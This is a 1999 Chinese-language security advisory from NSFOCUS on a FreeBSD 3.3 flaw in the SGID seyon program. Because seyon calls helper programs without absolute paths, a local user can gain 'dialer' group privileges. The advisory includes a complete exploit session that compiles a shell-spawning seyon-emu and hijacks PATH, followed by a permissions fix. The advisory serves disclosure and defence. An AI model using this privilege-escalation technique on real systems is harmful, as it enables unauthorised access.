首页 -> 安全研究

安全研究

安全漏洞
FreeBSD 3.3 seyon漏洞

发布日期:1999-11-16
更新日期:1999-11-16

受影响系统:
FreeBSD 3.3
描述:
FreeBSD 3.3-RELEASE版的安装光盘中带有seyon v2.14b软件包。这个版本(包含以前?)
存在安全漏洞,允许任意用户获得seyon所属组的特权。当缺省安装时,seyon被设置了SGID位
"dialer".

注意:不同版本的seyon和不同的2.14b包可能被设置了不同的属性。

syon执行时会先执行"seyon-emu"和"xterm",但这两个程序的路径并没有用绝对路径,因此
通过在$PATH中增加一个用户可写目录并将用户自己的"seyon-emu"或"xterm"放到该目录下。
用户就可以让seyon以组ID "dialer"的身份来运行它们,从而获得"dialer"组的特权。





测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

bash-2.03$ uname -a; id; ls -la `which seyon`
FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999
jkh@highwing.cdrom.com:/usr/src/sys/compile/GENERIC i386
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
-rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon
bash-2.03$ cat > seyonx.c
void main () {
setregid(getegid(), getegid());
system("/usr/local/bin/bash");
}
^D
bash-2.03$ gcc -o seyon-emu seyonx.c
bash-2.03$ PATH=.:$PATH
bash-2.03$ seyon
bash-2.03$ id
uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec)
bash-2.03$




建议:
chmod 750 `which seyon`
并将需要运行seyon的用户增加到"dialer"组中。





浏览次数:9692
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障